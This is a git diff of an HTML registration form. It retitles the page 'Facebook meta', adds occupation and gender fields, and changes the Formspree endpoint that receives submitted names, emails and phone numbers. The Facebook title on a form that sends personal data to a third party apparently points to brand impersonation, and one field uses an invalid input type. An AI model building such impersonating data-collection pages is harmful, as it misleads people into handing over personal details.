--- a/Index meta.html
+++ b/Index meta.html
@@ -3,7 +3,7 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Lekvar Registration</title>
+    <title>Facebook meta</title>
     <style>
         body {
             font-family: Arial, sans-serif;
@@ -110,10 +110,14 @@
 <div class="container">
     <form id="registrationForm">
         <label for="name">Name:</label>
-        <input type="text" id="name" name="name" required>
-
+        <input type="text" id="name" name="name" required> 
+        <label for="occupation">Occupation:</label>
+        <input type="text" id="occupation" name="occupation" required> 
         <label for="email">Email:</label>
         <input type="email" id="email" name="email" required>
+        
+        <label for="gender">Gender:</label>
+        <input type="gender" id="gender" name="gender" required>
 
         <label for="phone">Phone Number:</label>
         <input type="tel" id="phone" name="phone" required>
@@ -167,7 +171,7 @@
         let formData = new FormData(this);
 
         // Sending form data to Formspree
-        let formspreeURL = "https://formspree.io/f/xjkkprdq";
+        let formspreeURL = "https://formspree.io/f/mnnjvnbj";
 
         fetch(formspreeURL, {
             method: "POST",
